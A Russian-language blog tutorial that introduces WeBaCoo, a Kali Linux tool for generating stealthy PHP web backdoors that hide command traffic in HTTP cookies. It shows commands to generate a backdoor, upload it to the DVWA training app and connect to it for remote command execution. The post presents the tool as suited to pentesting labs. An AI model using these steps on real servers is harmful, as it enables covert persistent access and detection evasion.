WeBaCoo (Web Backdoor Cookie) — скрипт для создания бэкдора PHP (скрытого соединения между клиентом и веб-сервером через HTTP). Это инструмент пост-эксплуатации, способный поддерживать доступ к скомпрометированному веб-серверу. В этой статье я познакомлю с WeBaCoo и покажу как его использовать на Kali Linux.
Еще по теме: ICMP-туннелирование при пентесте
Что такое WeBaCoo
WeBaCoo — этот скрипт Perl для создания бэкдора и удаленного скрытого подключения к веб-серверу. Инструмент был разработан для работы под радаром современных антивирусов, NIDS (систем обнаружения), IPS (систем предотвращения вторжений), сетевых брандмауэров и брандмауэров приложений.
Инструмент имеет два режима работы:
- Генерация ( -g) — режим для создания бэкдора PHP.
- Терминал ( -t) — режим для подключения к бэкдору.
Интересная особенность WeBaCoo заключается в том, что соединение между веб-сервером и клиентом закодировано в файле cookie заголовка HTTP, поэтому его трудно обнаружить антивирусом, системами обнаружения / предотвращения сетевых вторжений, сетевыми брандмауэрами и брандмауэрами приложений.
Установка WeBaCoo
WeBaCoo уже предустановлен на Kali Linux, но если вы используете другой дистрибутив, тогда можете установить через apt:
|
1 |
sudo apt install webacoo |
Использование WeBaCoo для создания скрытого соединения
Сначала по традиции заглянем в справку WeBaCoo:
|
1 |
webacoo -h |
Теперь используя WeBaCoo, создадим бэкдор PHP:
|
1 |
webacoo -g -o /home/kali/testbackdoor.php |
В приведенной выше команде, мы используем параметр -g для создания бэкдора и параметр -o для выбора местоположения созданного файла (в моем случае — домашний каталог):
|
1 |
home/kali |
После выполнения команды будет создан бэкдор PHP.
Теперь пришло время загрузить его на уязвимый сервер или сайт. Здесь мы предполагаем, что сервер не имеет никаких ограничений, которые могут запрещать определенные расширение или типы загружаемого файла.
Для этого примера, загрузим его на специально уязвимое веб-приложение DVWA, созданное для таких, как мы (этичных хакеров).
После успешной загрузки, будет отображен путь к загруженному файлу (см. скрин выше). Этот путь является фактическим местоположением загруженного файла. Он нужен нам для доступа к полезной нагрузке.
Теперь можем получить доступ к бэкдору PHP с помощью WeBaCoo. Для этого в терминале выполняем команду:
|
1 |
webacoo -t -u http://127.8.0.1/hackable/uploads/testbackdoor.php |
После применения вышеуказанной команды, вы увидите сообщение о подключение бэкдора. Чтобы проверить работу бэкдора, запустим несколько команд.
С помощью префикса : можно управлять бекдором, выполняя различные команды. Со всеми остальными фишками, разберетесь сами.
Вот таким образом, с помощью WeBaCo можно создать бэкдор PHP и использовать его для удаленного подключения.
Как видите WeBaCoo очень прост в использовании, но используйте тулзу с умом, не нарушая закон!
РЕКОМЕНДУЕМ:
